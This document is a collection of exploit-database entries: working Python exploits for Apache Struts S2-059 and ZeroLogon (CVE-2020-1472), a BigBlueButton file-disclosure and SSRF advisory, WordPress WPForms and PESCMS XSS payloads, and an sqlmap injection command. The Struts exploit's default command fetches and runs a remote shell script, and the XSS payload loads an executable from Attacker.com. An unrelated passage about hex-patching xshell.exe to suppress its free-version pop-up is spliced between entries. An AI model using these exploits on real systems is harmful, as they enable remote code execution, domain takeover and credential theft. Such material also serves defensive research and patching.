# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation # Date: 08/18/2020 # Exploit Author: West Shepherd # Vendor Homepage: https://struts.apache.org/download.cgi # Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) # CVE : CVE-2019-0230 # Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. # Source(s): # https://github.com/PrinceFPF/CVE-2019-0230 # https://cwiki.apache.org/confluence/display/WW/S2-059 # *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 # !/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import logging class Exploit: def __init__( self, target='', redirect=False, proxy_address='' ): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.target = target self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.query_params = {} self.form_values = {} self.cookies = {} boundary = "---------------------------735323031399963166993862150" self.headers = { 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, 'Accept': '*/*', 'Connection': 'close' } payload = "%{(#nike='multipart/form-data')." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#_memberAccess?(#_memberAccess=#dm):" \ "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ "(#ognlUtil.getExcludedPackageNames().clear())." \ "(#ognlUtil.getExcludedClasses().clear())." \ "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \ "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \ "getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ "(#ros.flush())}" self.payload = "--%s\r\nContent-Disposition: form-data; name=\"foo\"; " \ "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( boundary, payload, boundary ) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params ) def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def send_payload(self, command='curl --insecure -sv https://10.10.10.10/shell.py|python -'): url = self.target stdout.write('sending payload to %s payload %s' % (url, command)) resp = self.do_post(url=url, params=self.query_params, data=self.payload.replace('{COMMAND}', command)) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-0230 Struts 2 exploit') try: parser.add_argument('-target', action='store', help='Target address: http(s)://target.com/index.action') parser.add_argument('-command', action='store', help='Command to execute: touch /tmp/pwn') parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False') parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, target=options.target ) if options.debug: exp.debug() stdout.write('target %s debug %s proxy %s\n' % ( options.target, options.debug, options.proxy )) result = exp.send_payload(command=options.command) stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))

xshel and xftp are one of my favorite and common tools. Many advantages have been improved since Xshell upgraded to the seventh version. Because my cousin refused to accept life, he could only use the free version. However, after using the free version, there will be a pop-up window of free declaration. I cannot tolerate this for patients with obsessive-compulsive disorder. This article solves this problem through our assembly method! Beginner Since it is a pop-up window, many security tools have the function of pop-up blocking. (360 Turquoise Tencent Butler) both contain this function. So we just need to intercept it. Here, we have Tencent as an example. Set the following to intercept immediately! But at the moment the software is closed, something will come out. (Of course this is also something that patients with obsessive-compulsive disorder cannot tolerate) Assembly Decompile Required Compilation Tool 010Editor Official website download https://www.sweetscape.com/010editor/ Download the 010Editor binary modification tool, free trial for 30 days, enough. Be careful to backup first! 010Editor Open xshell.exe, search globally 74 11 6A 00 6A 07 6A 01, change the beginning 74 to EB (note that it is capitalized) and save Effect Video Explanation

# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege # Date: 2020-10-04 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 # Tested on: Microsoft Windows Server 2016 Standard x64 # CVE : CVE-2020-1472 # Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code # Sources: https://www.secura.com/pathtoimg.php?id=2055 # Requirements: python3 and impacket 0.9.21+ (tested using this version) #!/usr/bin/env python3 import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs from binascii import hexlify, unhexlify from subprocess import check_call from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED from impacket.dcerpc.v5 import nrpc, epm, transport from impacket import crypto, version from impacket.examples import logger from Cryptodome.Cipher import AES from struct import pack, unpack from impacket.dcerpc.v5.rpcrt import DCERPCException class Exploit: def __init__( self, name='', address='', attempts=2000, password='' ): name = name.rstrip('$') self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\ .ServerSecureChannel self.authenticator = self.getAuthenticator(stamp=0) self.clearNewPasswordBlob = b'\x00' * 516 self.primaryName = ('\\\\%s' % name) + '\x00' self.accountName = ('%s$' % name) + '\x00' self.computerName = name + '\x00' self.clientCredential = b'\x00' * 8 self.clientChallenge = b'\x00' * 8 self.negotiateFlags = 0x212fffff self.address = address self.max = attempts self.dce = None self.sessionKey = None self.clientStoredCredential = None self.password = password def encodePassword(self, password): if isinstance(password, str): password = password.encode('utf-8') return b'\x00' * (512 - len(password))\ + password \ + pack('<L', len(password)) def getAuthenticator(self, creds=b'\x00' * 8, stamp=10): authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator['Credential'] = creds authenticator['Timestamp'] = stamp return authenticator def serverReqChallenge(self): try: binding = epm.hept_map( self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp' ) self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc() self.dce.connect() self.dce.bind(nrpc.MSRPC_UUID_NRPC) return nrpc.hNetrServerReqChallenge( self.dce, self.primaryName, self.computerName, self.clientChallenge ) except BaseException as ex: self.logError(ex) def serverAuthenticate(self): try: auth = nrpc.hNetrServerAuthenticate3( self.dce, self.primaryName, self.accountName, self.secureChannelType, self.computerName, self.clientCredential, self.negotiateFlags ) assert auth['ErrorCode'] == 0 self.logInfo('successfully authenticated') return True except nrpc.DCERPCSessionError as ex: self.dce = None if ex.get_error_code() == 0xc0000022: return None else: self.logFail(ex.get_error_code()) except BaseException as ex: self.dce = None self.logFail(ex) self.dce = None def serverPasswordSet(self): try: return nrpc.hNetrServerPasswordSet2( self.dce, self.primaryName, self.accountName, self.secureChannelType, self.computerName, self.authenticator, self.clearNewPasswordBlob ) except BaseException as ex: self.logError(ex) def authenticate(self): self.logInfo( 'checking target, attempting to authenticate %d max attempts' % self.max ) for attempt in range(0, self.max): self.logInfo('attempt %d' % attempt) self.serverReqChallenge() self.serverAuthenticate() if self.dce is not None: break if self.dce: return True else: self.logError('failed to authenticate') def exploit(self): self.logInfo('attempting password reset') reset = self.serverPasswordSet() if reset['ErrorCode'] == 0: self.logInfo('successfully reset password') else: self.logError('failed to reset password') return self def ComputeNetlogonCredentialAES(self, challenge): return nrpc.ComputeNetlogonCredentialAES( challenge, self.sessionKey ) def logInfo(self, message): sys.stdout.write("[+] %s\n" % str(message)) return self def logError(self, message): sys.stderr.write("[-] error %s\n" % str(message)) def logFail(self, message): sys.stderr.write("[!] failure %s\n" % str(message)) sys.exit(2) def restore(self): self.logInfo('attempting to restore password') self.clientChallenge = b'12345678' try: self.primaryName = NULL challenge = self.serverReqChallenge() self.sessionKey = nrpc.ComputeSessionKeyAES( '', self.clientChallenge, challenge['ServerChallenge'] ) self.clientCredential = self.ComputeNetlogonCredentialAES( self.clientChallenge ) try: self.serverAuthenticate() except Exception as e: if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: raise self.logInfo('restoring password') self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10) self.authenticator = self.getAuthenticator( creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential) ) self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES( self.encodePassword(self.password) ) reset = self.serverPasswordSet() if reset['ErrorCode'] == 0: self.logInfo('successfully restored password') else: self.logError('failed to restore password') except Exception as ex: self.logError(ex) return self if __name__ == '__main__': info = """ NOTE - Exploitation will break the DC until restored, recommended guidelines: 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN: cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP> 2. Exploit the DC - this will break the DC until restored: cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP> 3. Dump the DC - for the DA hashes, this will not contain the machine hex-pass: secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP> 4. Dump the DC again - use the DA hash to get the machines hex-pass: secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP> 5. Restore target - this fixes the DC: cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS> """ parser = argparse.ArgumentParser( description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege', add_help=True ) try: parser.add_argument('-do', default='check', action='store', help='What to do (default check): [check|restore|exploit]') parser.add_argument('-target', action='store', help='NETBIOS name of target DC (not the FQDN)') parser.add_argument('-ip', action='store', help='IP address of target DC') parser.add_argument('-password', default='', action='store', help='The plaintext password to use to reset the DC') parser.add_argument('-hex', default='', action='store', help='The hex password to use to restore the DC (recommended)') parser.add_argument('-max', default=2000, action='store', help='Max attempts to authenticate with the DC (usually ~300 or less)') if len(sys.argv) < 3: parser.print_help() print(info) sys.exit(1) options = parser.parse_args() if options.do.lower() == 'check': Exploit( name=options.target, address=options.ip, attempts=int(options.max) ).authenticate() elif options.do.lower() == 'exploit': exp = Exploit( name=options.target, address=options.ip, attempts=int(options.max) ) if exp.authenticate(): exp.exploit() elif options.do.lower() == 'restore': if options.hex != '' and options.password == '': options.password = unhexlify(options.hex) if options.password != '': exp = Exploit( name=options.target, address=options.ip, password=options.password ).restore() else: parser.print_help() except Exception as error: sys.stderr.write('[-] error in main %s\n' % str(error))

# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery # Date: 2020-09-11 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://bigbluebutton.org/ # Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web conferencing system which allows participants of a conference with permissions to upload presentations to read arbitrary files from the file system and perform server-side requests. This leads to administrative access to the BigBlueButton instance. Details ======= Product: BigBlueButton Affected Versions: 2.2.25, potentially earlier versions as well Fixed Versions: 2.2.27 Vulnerability Type: Arbitrary File Disclosure and Server-Side Request Forgery Security Risk: medium Vendor URL: https://bigbluebutton.org/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005 Advisory Status: published CVE: CVE-2020-25820 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820 Introduction ============ "BigBlueButton is a web conferencing system designed for online learning." (from the vendor's homepage) More Details ============ BigBlueButton is a web conferencing system that allows participants with the appropriate privileges to upload files in various formats to be used as presentation slides. Among other formats, BigBlueButton accepts LibreOffice documents[1]. LibreOffice documents use the XML-based Open Document Format for Office Applications (ODF)[2]. For technical purposes, uploaded files are converted to PDF format with LibreOffice and afterwards to SVG for displaying[6]. The ODF file format supports using the XML Linking Language (XLink) to create links between documents[3]. When local files are referenced using XLinks, the contents of the respective files are included in the generated PDF file when BigBlueButton converts ODF documents with LibreOffice. This leads to an arbitrary file disclosure vulnerability, allowing malicious participants of conferences to extract files from the BigBlueButton server's file system. LibreOffice also embeds XLinks to remote locations when a document is converted, which allows to perform server-side requests. Proof of Concept ================ Start from an empty ODF Text Document and extract the content: $ mkdir tmp-doc && cd tmp-doc $ unzip ../empty.odt Archive: empty.odt extracting: mimetype creating: Configurations2/accelerator/ creating: Configurations2/images/Bitmaps/ creating: Configurations2/toolpanel/ creating: Configurations2/progressbar/ creating: Configurations2/statusbar/ creating: Configurations2/toolbar/ creating: Configurations2/floater/ creating: Configurations2/popupmenu/ creating: Configurations2/menubar/ inflating: manifest.rdf inflating: meta.xml inflating: settings.xml extracting: Thumbnails/thumbnail.png inflating: styles.xml inflating: content.xml inflating: META-INF/manifest.xml Replace the <office:body> element in the file content.xml with the following: <office:body> <office:text> <text:section text:name="string"> <text:section-source xlink:href="file:///etc/passwd" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/> </text:section> </office:text> </office:body> The text document now includes a section that references the external file /etc/passwd. Create an new ODF Text Document with the modified content: $ zip -r ../modified.odt * The document can now be uploaded as a presentation. After the conversion, the presentation shows the contents of the file /etc/passwd from the system running the BigBlueButton conferencing software. To perform server-side requests, substitute the xlink:href attribute's value with a remote URL such as http://example.com: <office:body> <office:text> <text:section text:name="string"> <text:section-source xlink:href="http://example.com" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/> </text:section> </office:text> </office:body> When converting a document with this content, LibreOffice will fetch the website's content and embed it into the generated PDF file. Workaround ========== To work around this issue, the conversion feature should be disabled if it is not used. Otherwise, permission to upload presentations should only be given to trusted users. Additionally, the allowed file types for upload can be restricted to just PDF files. Fix === Update to fixed version 2.2.27. Change API key after update. Security Risk ============= As shown, the presentation conversion feature of BigBlueButton can be used to disclose arbitrary local files. Through the file disclosure, attackers can gain access to the credentials of the BigBlueButton instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties, /usr/share/bbb-apps-akka/conf/application.conf), which allows for administrative access to BigBlueButton through its API (see [5]), including all conferences. Additionally, it is possible to perform server-side requests. Note that this vulnerability is different from CVE-2018-10583 [4], because the risk is not the disclosure of credentials sent while fetching remote resources, but the ability to access resources that are in the same network segment as the BigBlueButton instance, which is possibly not accessible from the Internet. To exploit this vulnerability, attackers need to have access to a conference with the ability to upload presentations. While successful exploitation of this vulnerability would pose severe consequences for the affected BigBlueButton instance, it is only rated to pose a medium risk due to the requirement of having presentator access. Timeline ======== 2020-09-11 Vulnerability identified 2020-09-18 Customer approved disclosure to vendor 2020-09-22 CVE ID requested 2020-09-22 CVE ID assigned 2020-09-24 Requested encrypted communication with vendor 2020-09-25 Vendor unable to provide encrypted communication, Vendor notified 2020-09-25 Vendor confirmed being able to reproduce vulnerability, mentioned similar bugreport 2020-09-25 Requested information whether "similar burgreport" uses the same vulnerability - no answer 2020-10-13 Again requested information whether "similar burgreport" uses the same vulnerability, whether release shedule is known - no answer 2020-10-14 Vendor released fixed version (without mentioning vulnerability) 2020-10-21 Vulnerability published by third party [7] 2020-10-21 Advisory released References ========== [1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton [2] http://opendocumentformat.org/ [3] https://www.w3.org/TR/xlink11/ [4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583 [5] https://docs.bigbluebutton.org/dev/api.html#usage [6] https://docs.bigbluebutton.org/support/faq.html#presentations [7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated) #Exploit Author : ZwX #Exploit Date : 2020-10-23 #Vendor Homepage : https://wpforms.com/ #Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip [+] Description Vulnerability: ============================== A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower. To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site. [+] Proof Of Concept: ===================== # HTML Code # <textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea> <textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;/></textarea> # Methode POST # POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 7081 Origin: http://localhost Connection: close action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a # URL Proof Of Concept # http://localhost/?wpforms_form_preview=990

# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS # Date: 2020-11-18 # Exploit Author: icekam # Vendor Homepage: https://www.pescms.com/ # Software Link: https://github.com/lazyphp/PESCMS-TEAM # Version: PESCMS Team 2.3.2 # CVE: CVE-2020-28092 PESCMS Team 2.3.2 has multiple reflected XSS via the id parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id= please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6 now I input payload : "><ScRiPt>alert(1)</ScRiPt>

# Exploit Title: xuucms 3 - 'keywords' SQL Injection # Date: 2020-11-18 # Exploit Author: icekam # Vendor Homepage: https://www.cxuu.top/ # Software Link: https://github.com/cbkhwx/cxuucmsv3 # Version: cxuucms - v3 # CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to: https://github.com/cbkhwx/cxuucmsv3/issues/1 Use SQLMAP authentication: sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b --current-db --hostname